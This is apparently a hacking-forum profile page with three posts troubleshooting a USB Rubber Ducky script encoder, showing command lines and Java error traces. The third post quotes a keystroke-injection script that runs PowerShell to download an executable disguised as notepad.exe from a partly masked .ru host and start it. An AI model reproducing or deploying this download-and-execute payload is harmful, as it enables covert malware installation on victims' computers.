Jump to content

alexx

Active Members
  • Posts

    3
  • Joined

  • Last visited

Everything posted by alexx

  1. Thanks for all. Problem solved, input file needs to be .RTF format. Java latest...
  2. in 1.2 version: C:\Program Files\Atmel\Flip 3.4.2\bin>java -jar duckencode.jar -i script.txt -o inject.bin Error with input file! Exception in thread "main" java.lang.reflect.InvocationTargetException at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source) at java.lang.reflect.Method.invoke(Unknown Source) at org.eclipse.jdt.internal.jarinjarloader.JarRsrcLoader.main(JarRsrcLoa der.java:58) Caused by: java.lang.NullPointerException at Encoder.main(Encoder.java:111) ... 5 more C:\Program Files\Atmel\Flip 3.4.2\bin> with the same input file, -L not used no spaces at the end, file fully correct
  3. hi can't solve this problem with encoder 2.2 , 1.2 Microsoft Windows [Version 6.2.9200] C:\Users\for\Desktop\rubberD\DuckEncoder_v2.2>java -jar encoder.jar -i script.tx t Error with input file! Exception in thread "main" java.lang.NullPointerException at Encoder.main(Encoder.java:107) C:\Users\for\Desktop\rubberD\DuckEncoder_v2.2>java -jar encoder.jar -i script.tx t -o inject.bin -l ru Error with input file! Exception in thread "main" java.lang.NullPointerException at Encoder.main(Encoder.java:107) C:\Users\for\Desktop\rubberD\DuckEncoder_v2.2> input file: DELAY 2000 GUI r DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://****.ru/notepad.exe','%TEMP%\notepad.exe'); Start-Process "%TEMP%\notepad.exe" ENTER Trying to use online decoder & have troubles too.
×
×
  • Create New...